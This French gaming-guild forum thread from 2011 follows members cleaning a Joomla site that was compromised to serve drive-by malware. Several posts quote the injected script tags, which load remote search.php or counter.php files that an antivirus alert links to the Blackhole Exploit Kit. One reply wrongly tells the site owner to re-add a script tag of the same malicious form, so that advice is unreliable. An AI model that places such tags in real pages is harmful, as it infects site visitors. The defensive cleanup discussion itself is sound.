Forum Reboot et Itila Cala
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.


Forum de guilde Reboot (Rift et Aion) et de la confrérie Itila Cala (LOTRO)
 
Portail généralPortail général  AccueilAccueil  ConnexionConnexion  S'enregistrerS'enregistrer  Dernières imagesDernières images  
-20%
Le deal à ne pas rater :
(Adhérents Fnac) Enceinte Bluetooth Marshall Stanmore II Noir
199.99 € 249.99 €
Voir le deal

 

 Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)

Aller en bas 
+5
Elestil
Akagloriono
Enge
Fine
Gudrimhid
9 participants
Aller à la page : 1, 2  Suivant
AuteurMessage
Gudrimhid
Admin
Gudrimhid


Nombre de messages : 4324
Localisation : Saint quentin (02)

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeMar 29 Mar 2011 - 21:24

Ce soir, le site de enge a été attaqué par un virus, en effet,
à chaque fois que l'on cliquait sur un lien de son site, un trojan infectait l'ordinateur de l'utilisateur.
Tous les liens menant à son site ont été supprimés le temps de savoir ce qui se passe.
je vous demande également de faire un scan antivirus pour voir si vous détectez une possible infection.
Gud


Dernière édition par Gudrimhid le Mer 30 Mar 2011 - 5:43, édité 1 fois
Revenir en haut Aller en bas
https://reboot.actifforum.com
Fine
Héros du bavardage
Fine


Nombre de messages : 709

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeMer 30 Mar 2011 - 0:35

Le problème sur le pc d'enge vient d'etre regle.

Il demarre correctement et proprement.

Le probleme du site je laisse le soin a enge de verifier, mais logiquement il est regle aussi.
Les liens qui fesaient foirer sont supprimés, enge va verifier tout ca je lui fais confiance Smile


[edit] bon en realite maintenant c'est bon Smile
Il restait un tout petit probleme a regle et ca a ete un peu long mais c'est bon Smile
Sur ce a voir pour la suite sur le site d'enge pour rift Smile


Dernière édition par Fine le Mer 30 Mar 2011 - 1:34, édité 1 fois (Raison : l'a ete un peu recalcitrant!!!!)
Revenir en haut Aller en bas
Enge
Archange parleur
Enge


Nombre de messages : 2575
Localisation : 6, cour des Myrtes, Ormecoin, Comté

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeMer 30 Mar 2011 - 7:00

Une fin d'après-minuit pluvieuse mais studieuse.
Au coeur du centre de commandement, les archivistes s'activaient : récolte d'informations, analyse et rédactions de rapports divers. Leur quotidien de ces derniers jours.

L'atmosphère changea presque imperceptiblement. Quelques rouages un peu grippés, quelques informations à peine étranges. Juste de quoi faire sourciller l'archiviste.

19h. Le poste de sentinelles transmet un rapport d'événement : un individu à la mine louche a été réperé puis appréhendé. La justice est simple en ce pays : tout individu à la mine étrange se voit appréhendé, enfermé au cachot puis exécuté sans aucune autre forme de procès. Cela décourage les malfaiteurs parait-il...

Les archivistes laissent leur place. Il faut vider les lieux, dans un peu moins de deux heures, les combattants vont investir la salle de commandement. Une expédition en terre inconnue était programmée ce soir là.

20h30. Le premier membre de l'expédition entre dans le poste de commandement. Il est au fait du premier rapport et par acquis de conscience fait rapidement le tour des informations en provenance de l'extérieur. C'est le moment que choisit le deuxième rapport d'alerte / emprisonnement / exécution fait son apparition. Il fronce les sourcils, agacé. Puis inquiet quand un troisième est craché par la machine.
L'expédition est lancée et se déroule relativement sans accroc.

23h15. Un autre valeureux chef fait son apparition dans la salle de commandement. Il est porteur de mauvaises nouvelles : les terres extérieures ont été infiltrées puis corrompues. Désormais, quiconque s'en approche pourrait être contaminé.

23h30. C'est devant le Fléau de Durin (le seul, le vrai, celui du si estimé Gandalf le gris !) qu'elle est obligée de rendre les armes et se replier honteusement dans la salle de commandement, laissant tous ses compagnons en rade.

23h45. Les portes du poste de commandement sont attaquées, les premiers mercenaires entrent et commencent leur entreprise de dévastation. Les quelques maigres actions qu'elle tente pour les repousser n'a aucun effet. Quelques gouttes d'eau sur un feu dévastateur. Appelés à l'aide par le deuxième Chef, de valeureux soldats se sont rassemblés, là-bas, loin. Un débat s'engage : qui est l'envahisseur ? Comment peut-on stopper sa progression ? Quels dégâts est-il en train de causer ? Et bien sûr : Va-t-il être possible de l'éradiquer sans dommages collatéraux ?

Minuit. Elle contemple, anéanti le champ de ruines. Le coeur du poste de commandement est dévasté. Plus rien ne répond, elle est désormais totalement isolée du reste du monde. Seul un canal, celui de l'espoir, persiste, sur une petite machine oubliée dans un coin. Seul lien avec le deuxième poste de commandement monté en toute urgence.

Minuit trente. Ils se sentent impuissants. La vague d'envahisseurs les a pris de court, ils sont démunis, ont proposé toutes les solutions qui leur venaient à l'esprit.

1h00. les premiers sauveteurs quittent doucement le poste de secours. En tête, l'idée que seul raser le tout pour reconstruire était désormais possible.

1h30. Il ne reste plus qu'elle et un sauveteur acharné qui ne veut pas rendre les armes, et qui, silencieux dans son coin, cherche, creuse.
Et avance doucement.
Sur les terres extérieures, la bataille est terminée. Rien de tel pou vaincre l'ennemi que d'utiliser ses propres armes.

2h00. L'envahisseur est identifié. Un plan de bataille pour repousser l'intrus est élaboré pas à pas. Ils ne sont plus que deux, mais la détermination du guerrier muet ne faiblit pas.

2h30. La mission de récupération sur le poste de commandement principal est un succès. Guidé pas à pas, elle a remis la main sur les commandes principales et circonscrit l'envahisseur. Il faut maintenant l'éradiquer, l'anéantir, le réduire en poussière.

3h00. L'ennemi est poussé dans ses derniers retranchements. Acculé dans un coin, il ne bouge plus.

3h20. Le coup de grâce est donné. La justice expéditive ne lui a laissé aucune chance : lui comme les autres est envoyé sans forme de procès sur l'échafaud. De son passage ne reste que de légères traces : dans le poste de commandement, quelques serrures, ici et là, gisent à terre. Il faudra les remplacer.

Les deux derniers combattants, fatigués, mais victorieux, peuvent aller prendre du repos sans crainte. Une nouvelle vérification des systèmes est en cours, elle donnera son verdict quelques heures plus tard : plus de traces de l'envahisseur. Par mesure de précaution, un audit complet des terres et voies de communication sera fait dès l'aurore, mais ils ne sont pas inquiets, il ne donnera rien.



Merci à vous qui avaient répondu si vite à mon appel et avez fait tout ce que vous pouviez.
Merci Fine.
Revenir en haut Aller en bas
http://www.biblioenge.fr
Akagloriono
Eclaireur
Akagloriono


Nombre de messages : 332
Localisation : ABU

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeMer 30 Mar 2011 - 9:25

Bon alors a 11h23 j'ai eu le message suivant sur mon AVG

Menace a été bloqué!
libmarbis.webd.pl/search.php
Exploit Blackhole Exploit Kit(type 1380)
Je n'etais pas sur le planner mais sur la pages des ressources de guilde.

PS: GG Fine ! à l'occasion tu m'expliquera comment tu as fais Smile

Aka
Revenir en haut Aller en bas
Fine
Héros du bavardage
Fine


Nombre de messages : 709

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeMer 30 Mar 2011 - 10:53

Alors a la vue de cette menace, il s'agit d'un script css qui s'active a chaque clic sur un lien quelconque de la page chargée.
Visiblement je vois que enge travaille avec joomla, et ce n'est pas le seul site qui se fait "hacke" avec joomla.
Il y a pas mal de retours de probleme de ce genre avec joomla puisque qu'un seul et meme script du site sert de toile de fond...

Enge pour regler ce probleme, il suffit que tu accedes avec un editeur texte a la page de base (index.php)
Et que tu supprimes la ligne suivante
Code:
<script type="text/javascript" src="http://limarbis.webd.pl/search.php"></script>

Qui doit logiquement se trouver tout en haut de la page que tu vas ouvrir.
Dis nous des que c'est fait qu'on puisse reverifier Smile


[EDIT]

Tres bien tourné enge je trouve l'histoire Smile
Chapeau bas Smile
Revenir en haut Aller en bas
Enge
Archange parleur
Enge


Nombre de messages : 2575
Localisation : 6, cour des Myrtes, Ormecoin, Comté

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeMer 30 Mar 2011 - 12:01

C'est fait Smile

De nouveau merci !
Revenir en haut Aller en bas
http://www.biblioenge.fr
Fine
Héros du bavardage
Fine


Nombre de messages : 709

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeMer 30 Mar 2011 - 12:03

tu as du supprimer trop de lignes la mademoiselle Smile


[EDIT]
en tete du fichier mets ca a la place
Code:
<script type="text/javascript" src="http://studiodada.biz/search.php"></script>
Revenir en haut Aller en bas
Enge
Archange parleur
Enge


Nombre de messages : 2575
Localisation : 6, cour des Myrtes, Ormecoin, Comté

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeMer 30 Mar 2011 - 12:44

C'est corrigé, j'avais supprimé un [ < ? php ] de trop :p.
Revenir en haut Aller en bas
http://www.biblioenge.fr
Fine
Héros du bavardage
Fine


Nombre de messages : 709

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeMer 30 Mar 2011 - 17:31

Et bah voila tout est bien qui fini bien Smile
Tant mieux je viens de faire le tour complet du site pour verifier visiblement plus rien qui s'ouvre bizarrement Smile
Une bonne nouvelle pour un depannage hors du temps Smile



[EDIT] pour info le site fourni apres le /script sur les scripts css n'est pas forcement ce site la, mais visiblement plusieurs sites ont deja subit la modification de ce script clean pour en faire un installeur de virus...
Il en a ete recense une centaine. Pour corriger le probleme il suffit donc de supprimer la commande /script completement afin de ne pas ouvrir de script quelconque, en evitant de supprimer des commandes vitales comme le ?php par exemple Smile
Revenir en haut Aller en bas
Elestil
Eclaireur
Elestil


Nombre de messages : 299

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeJeu 31 Mar 2011 - 4:17

Je ne pourrais que conseiller l'utilisation de l'Add-on NoScript pour Firefox, qui permet de filter l'exécution du JS par domain.
Revenir en haut Aller en bas
Enge
Archange parleur
Enge


Nombre de messages : 2575
Localisation : 6, cour des Myrtes, Ormecoin, Comté

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeJeu 31 Mar 2011 - 8:41

Bon, alors. Suite mais hélas pas fin de l'histoire Sad

Ce matin, c'est mon portable qui subit une attaque en règle :
Je me suis connectée sur le site de ma classe comme chaque matin (je fais réciter les enfants en poésie chaque jour, et entre en direct leur note sur le site). J'ai tout de suite constatée que le chemin suivi pour accéder aux pages prenait des intermédiaires (pas les mêmes que mardi soir, ça serait trop simple). Avec en même temps des alertes virus par Avira.

Branle-bas de combat immédiat (super facile quand on a 26 gamins à gérer en même temps...) :
- Edition du fichier index.php, qui s'était en effet vu modifié avec une jolie ligne ajoutée en début
- Immédiatement, aller chercher un scan antivirus en ligne
- Dans le même temps, tripler la protection du portable : installation de Microsoft Sécurity Essentials et de PC Tools Spyware doctors
- Une fois l'installation de ces deux fait : scan complet du PC par les trois antivirus (impossible de lancer le scan avec Avira tout de suite, cela faisait conflit avec l'installation de Spyware doctor, j'ai donc du attendre).

Verdict :

- 2 détections par Spyware doctors : Application.TrackingCookies (5 infections - menace faible) et Trackware.Tracking Cookies!rem (3 infections - menace faible).
Sauf que Spyware doctors étant en version gratuite, il a détecté, mais bien sûr il ne veut pas supprimer.

- Première analyse rapide de MS Security Essentials : rien. J'ai donc relancé une analyse complète.

- Rapport de Avira : 1 seule détection, 15 fois de suite... Il a détecté Spyware Doctor... mais rien d'autre Sad
Code:
Evénements exportés :

31/03/2011 10:20 [Scanner] Logiciel malveillant détecté
      Le fichier 'C:\ProgramData\PC Tools\DownloadManager\Spyware
      Doctor8.0\sdsetup_pr_dl.exe'
      contenait un virus ou un programme indésirable 'TR/ATRAPS.Gen' [trojan].
      Action(s) exécutée(s) :
      Le fichier a été déplacé dans le répertoire de quarantaine sous le nom
      '4de09894.qua' !

Les scans en ligne pour l'instant ne donne rien Sad

J'en suis là Sad
Revenir en haut Aller en bas
http://www.biblioenge.fr
Enge
Archange parleur
Enge


Nombre de messages : 2575
Localisation : 6, cour des Myrtes, Ormecoin, Comté

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeJeu 31 Mar 2011 - 10:17

Bon, je déprime Sad

Je viens de vérifier en ligne : les transits sur mon site de classe passent par de plus en plus d'intermédiaires. Je viens pourtant de vérifier le fichier index.php, il n'y a plus la ligne en tout début.
Les scans complets de mon portable ne sont pas finis, mais à part les deux alertes de Spyware, il n'y a rien de plus.

Je suis démunie, en quoi je peux contrôler ce qui se passe en distant sur les serveurs physiques de mon hébergeur ?
Pour infos, le site de la guilde ne semble pas touché, pour ce que j'en ai vu, il n'y a pas d'intermédiaire sur la navigation.
Revenir en haut Aller en bas
http://www.biblioenge.fr
Gillial
Eclaireur
Gillial


Nombre de messages : 453

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeJeu 31 Mar 2011 - 10:39

Pour les spywares, prend plutot spybot.
Pour les virus avira est bien mais comme je te l'ai dit l'autre jour, certains virus se planquent a des endroits inacessible par un scan normal (rootkit). Le seul moyen de les virer efficacement est de brancher le disque infecté sur un autre PC et de lancer un scan.
J'y connais rien en site, mais si tu récupère ton site en ftp et que tu scan les fichiers avec l'antivirus ?
Revenir en haut Aller en bas
Urukhar
Disciple



Nombre de messages : 143
Localisation : Poissy

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeJeu 31 Mar 2011 - 12:23

Les scripts PHP sont des fichiers texte... donc une analyse antivirus ne ramènera rien.
Le seul moyen c'est d'examiner les fichiers pour voir s'il n'y a rien de suspect (genre un lien qui pointe là où il ne devrait pas...)
Revenir en haut Aller en bas
Urukhar
Disciple



Nombre de messages : 143
Localisation : Poissy

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeJeu 31 Mar 2011 - 12:25

Question : le site de ta classe est hébergé au même endroit qu'angedeserra.net ?
Revenir en haut Aller en bas
Enge
Archange parleur
Enge


Nombre de messages : 2575
Localisation : 6, cour des Myrtes, Ormecoin, Comté

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeJeu 31 Mar 2011 - 17:05

Site de ma classe : angedeserra.net/livrets
Site de la classe de ma soeur : angedeserra.net/sayan
Site de la guilde sur Rift : angedeserra.net/rift
Site du planner rift : angedeserra.net/riftplanner
etc.

J'ai un abonnement type Pro, donc mutibases.
Revenir en haut Aller en bas
http://www.biblioenge.fr
Gudrimhid
Admin
Gudrimhid


Nombre de messages : 4324
Localisation : Saint quentin (02)

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeJeu 31 Mar 2011 - 17:16

Spybot search and destroy est le meilleur logiciel gratuit pour scanner ta machine.
De plus une fois installé il te permet de gérer les changements de registre donc c'est une barrière de plus pour ton pc.
Pour les tracking cookies, essaies juste de vider tes cookies internet, ça devrait suffire. Elimine également tes fichiers temporaires internet.
Pour vérifier et réparer la base du registre j'utilise C cleaner également, de plus il nettoie de fond en comble cookies, et fichiers temporaires internet. Il est gratuit également.

Sinon pour un antivirus, je ne peux te dire, je sais que avira est bien pour un gratuit. Et il y a un an le meilleur payant c'était kasperki.
Vala ^^
Gud
Revenir en haut Aller en bas
https://reboot.actifforum.com
Jelena
Sage bavard



Nombre de messages : 1457

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeJeu 31 Mar 2011 - 21:36

Sur le site de ta classe :
\\
Citation :
script type="text/javascript" src="http://ogloszenia.lubelskieonline.pl/counter.php">http://birkul.com/counter.php">
<
C'est normal ce site pour les compteurs ?


Dernière édition par Jelena le Ven 1 Avr 2011 - 18:43, édité 1 fois
Revenir en haut Aller en bas
Oby
Maître Bavard
Oby


Nombre de messages : 698
Localisation : Taverny (95)

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeJeu 31 Mar 2011 - 21:56

Pour info, lorsque j'ai fait le site pour mon équipe CoD4, on m'a donné 2 conseils (je n'ai eu aucun problème depuis 4 ans, je ne sais pas si ça a joué) :

- Mettre tous les fichiers en "lecture seule" et retirer l'option "écriture" des répertoires (à faire dans les options des fichiers dans le client FTP que tu utilises). C'est un peu contraignant lorsqu'on veut mettre à jour son site, car il faut remettre l'option "écriture" pour les répertoires où l'on veut modifier/ajouter un fichier ainsi que sur le fichier à modifier.

- Ajouter un fichier "index.html" "vide" dans tous les sous répertoires de l'arborescence du site.
Dans ce fichier HTML, j'ai le code suivant :
Code:

<html>
<head>
<title>Vide</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
</head>
<body>
<h1></h1>
</body>
</html>

Si jamais ça peut aider.
Revenir en haut Aller en bas
Enge
Archange parleur
Enge


Nombre de messages : 2575
Localisation : 6, cour des Myrtes, Ormecoin, Comté

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeVen 1 Avr 2011 - 8:19

@ Jelena : euh... pas compris ta question :s

@ Oby :

1. Je n'ai pas assez de connaissances en développement pour savoir comment fonctionnent les interactivités entre fichiers sur une structure Joomla. Je ne sais pas du tout si il y de l'écriture sur ces fichiers en utilisation normale quotidienne, ou pas du tout et seulement une écriture dans la base de données.
De mon côté utilisatrice, il ne se passe pas deux jours sans qu'il y ai modifications des articles ou des fichiers à charger ou télécharger dessus, des images à intégrer...
Passer les droits en lecture seule (ou inverse) est très long (il me faut à chaque fois environ 20 à 30 min). Donc possible seulement si je n'ai pas besoin de le faire souvent.
Il faudrait qu'un connaisseur en Joomla puisse me le dire.

Et pour l'instant, pour ce qui est de angedeserra.net/rift... il ne se passe pas une journée sans que je ne touche aux fichiers, à des installations de nouveaux modules ou autres Very Happy, et ça tant que je ne serai pas sastifaite de moi... ^^.

2. A quoi sert ce fichier ? Qu'est-il sensé faire ou ne pas faire ?
Copier un fichier dans chacun des dossiers et sous-dossiers de l'architecture me fait un peu peur... je risque d'y passer des heures, c'est dingue le nombre de dossiers et sous-dossiers dans la structure...
Revenir en haut Aller en bas
http://www.biblioenge.fr
Urukhar
Disciple



Nombre de messages : 143
Localisation : Poissy

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeVen 1 Avr 2011 - 8:49

Il est vrai que cela peut être rebutant...
Tu n'as pas une interface d'administration au niveau de ton hébergeur ? si oui laquelle ? (normalement si c'est une interface issue du monde open source ils le mettent en avant dans leur offre).
Le cas échéant on peut peut-être s'arranger pour que la copie des index.html et autres modifications de droit portant sur toute l'arborescence soient facilitées...
Sinon, peut-être signaler à ton hébergeur que tu as été victime d'une attaque portant sur plusieurs de tes sites, parce que depuis le début on met en cause Joomla, mais la vulnérabilité vient peut-être aussi d'eux... donc il y a sûrement d'autres clients qui courent un risque.
Revenir en haut Aller en bas
Fine
Héros du bavardage
Fine


Nombre de messages : 709

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeVen 1 Avr 2011 - 14:07

Pour les sites des classes, il n'y a rien a signaler sur les pages.
Pas de virus ni autre trojan a l'installation bizarre en cliquant sur des liens.
Le fait que tu ai des intermediaires, il s'agit du fait que joomla etant gratuit il a des tendances a s'interconnecte avec des sites de pubs ou autres sites joomla qui en hebergent.
Rien de bizarre la dedans.
Pour ce qui est de la menace sur ton portable, tu as fait le necessaire rapidement et aucun probleme n'est plus detecte, rien ne sers de s'affoler.
Pour repondre aux questions que tu te posais sur la page d'oby, ce fichier ne fait rien de particulier, mais lors d'un hacking la premiere page touchee est souvent le fichier index.html.
En creant une page vide s'appellant index.html, les hackeurs (si ils sont pas trop doues) trouveront une page vide et passeront souvent leur chemin.
Enfin ce code cree une page blanche encodee en utf8 (texte) avec comme titre principal "vide" (ce qui s'affiche en haut de la barre de ton navigateur), avec un corps en gros caracteres (balise h1) ne contenant aucun texte (une page blanche quoi)

Enfin comme le suggere urukhar signale quand même ton probleme a ton hebergeur, mais il se peut aussi qu'il ai lui meme recours a un reseau dispatche ce qui pourrait aussi expliquer les intermediaires de liaison.


[EDIT]
J'ai trouve dans le script de ta page index.php du site de ta classe pas moins de 6 liens/scripts inutiles...
Tous de la même forme que celui supprime sur le site de la guilde.
Je ne les fournis pas puisqu'on ne sait jamais, mais je confirme dans ce cas qu'il s'agit bien de joomla et non l'hebergeur...
Les lignes de code sont modifiees directement sur l'index.php du site.
Ce n'est pas l'hebergeur qui y peut quelque chose malheureusement.
Revenir en haut Aller en bas
Enge
Archange parleur
Enge


Nombre de messages : 2575
Localisation : 6, cour des Myrtes, Ormecoin, Comté

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeSam 2 Avr 2011 - 7:14

La galère n'est pas finie Sad
Nouvelles alertes cette nuit. Détectées par Avira. Rien sur Spyware Doctor. Détectées et supprimées par Bitdefender en ligne.

Je laisse tourner Bitdefender le reste de la nuit. Ce matin, PC bloqué. Reboot... Alerte Centre de sécurité : parefeu désactivé et mises à jour automatiques Windows impossibles.
J'ai réactivé le parefeu sans souci (mais pourquoi a-t-il été désactivié cette nuit ? oO). En revanche, rien à faire pour les mises à jour Windows. Je n'arrive à rien. Impossible d'y accéder en ligne. Impossible de réactiver l'option sur le PC. En accédant manuellement à la page Windows sur Internet Explorer, même chose. J'ai cette réponse à chaque fois, quelque soit la manipulation :
Code:
Le site Web a rencontré une erreur et ne peut pas afficher la page demandée. Les
options fournies ci-dessous peuvent vous aider à résoudre le problème.
C'est bien cette adresse là ? (au cas où un virus ou autre cochonnerie ne m'enverrait pas au bon endroit) :
http://www.update.microsoft.com/windowsupdate/v6/default.aspx?ln=fr

J'ai vérifié sur le portable. Il a bien accès à la mise à jour. Mais ce n'est pas le même système (Vista au lieu de XP).
En revanche, impossible de démarrer une analyse en ligne Bitdefender sur le portable...
Revenir en haut Aller en bas
http://www.biblioenge.fr
Gudrimhid
Admin
Gudrimhid


Nombre de messages : 4324
Localisation : Saint quentin (02)

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeSam 2 Avr 2011 - 9:04

Essaie de faire un scan avec spybot enge sur tes deux pc:

Lien:
http://www.01net.com/telecharger/windows/Securite/anti-spyware/fiches/26157.html

A mon avis, il doit rester un lien sur ton pc qui permet de te traquer. Donc il faut analyser ça assez rapidement sinon les attaques vont continuer.
Courage.
Gud
Revenir en haut Aller en bas
https://reboot.actifforum.com
Fine
Héros du bavardage
Fine


Nombre de messages : 709

Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitimeSam 2 Avr 2011 - 11:46

visiblement comme le dit gud a juste titre il te reste un trackeur sur ton pc essayes de scanner avec spybot...
Malheureusement spyware doctor en version gratuite ne te nettoieras pas tes trackeurs
Revenir en haut Aller en bas
Contenu sponsorisé





Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Empty
MessageSujet: Re: Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)   Une nuit sanglante - (ou encore : Probleme avec le site de la guilde) Icon_minitime

Revenir en haut Aller en bas
 
Une nuit sanglante - (ou encore : Probleme avec le site de la guilde)
Revenir en haut 
Page 1 sur 2Aller à la page : 1, 2  Suivant
 Sujets similaires
-
» Probleme avec le forum?
» L'anniversaire de la guilde :)
» Bilan de la guilde
» Ou en est la Guilde des rerols ?
» Bonjour de la guilde Origines

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Forum Reboot et Itila Cala :: Reboot - Itila Cala :: A la taverne du pêcheur-
Sauter vers: